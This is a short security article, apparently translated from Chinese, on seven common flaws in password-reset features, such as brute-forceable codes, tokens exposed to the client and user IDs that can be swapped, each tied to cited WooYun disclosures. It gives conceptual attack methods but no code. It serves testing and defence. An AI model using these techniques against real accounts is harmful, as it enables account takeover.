Sleepy Dragon · 2013/07/17 23:51
0x00 Background
Where there are people, there are rivers and lakes.
In the Internet, where there is a user registration, there will be a password retrieval function.
And the password retrieval function may have vulnerabilities, many programmers do not think of.
And these vulnerabilities often may produce very big harm, such as user account stolen.
And this kind of vulnerability has appeared in very many big Internet companies.
0x01 Detection Mode and Case
Cloud search: password retrieve, password change, password reset keywords.
Summarize the following 7 points, if there are other also hope to remind complement ~!
This is something you can refer to when testing for your company’s projects.
There are several flaws in retrieving the password:
1. The certificate of password retrieval is too weak. If you only need to fill in a four-digit or six-digit pure number to reset the password, it can be cracked by force.
Case study:
WooYun: Dangdang arbitrary user password modification vulnerability
Here’s another classic example of a restriction that was circumvented:
WooYun: Vulnerability of user password modification
Limit the number of submissions, but there are logic problems, you can bypass, you can click to see.
2. The password retrieval certificate can be obtained directly from the client.
The password retrieval certificate is obtained on the client. When the password is retrieved, pay attention to the packet capture and check all url responses to see if there is a final certificate, so that you can bypass the mobile phone or secure mailbox.
WooYun: Defect of arbitrary password modification of catwalk group
3. The password retrieval certificate can be obtained directly on the page.
A classic case, find the answer to the password in the source code of the web page……
WooYun: Reset the password of any sohu mailbox user
4, password retrieval vouchers can be relatively easy to guess.
The key to retrieve the password is just the MD5 of the time stamp, which is detected by the white hat sharp ~, easily retrieve any account password.
WooYun: Password modification vulnerability of any qihoo 360 user
5. Password retrieval certificate storage is not just a matter of binding with a single user.
The retrieve password certificate is sent to the email. The URL contains the user’s information and credentials, but the credentials can be reset for any user.
WooYun: Identity pass arbitrary password modification – divulge large amounts of citizen information
6. The email address or mobile phone number of the user to retrieve the password is changed.
In fact, this should be a logical problem of binding the secure phone, so that any user can help their controllable secure phone, and then they can reset the mobile phone number of anyone.
WooYun: Netease Email can directly change the passwords of other users
7. Logic error in the last password submitted for change.
All the previous logic is fine, so is there no problem?
White hat also found that in the last reset password to follow a user ID, change the ID of other users, you can change the other users to change the password you just changed.
WooYun: Change the password of any boss of Ctrip (celebrate the 100th hole of WooYun)
0x02 Recovery Plan
Retrieving password credentials is complex and unguessable, but note the logic above: no overreach, or important credentials in the wrong place.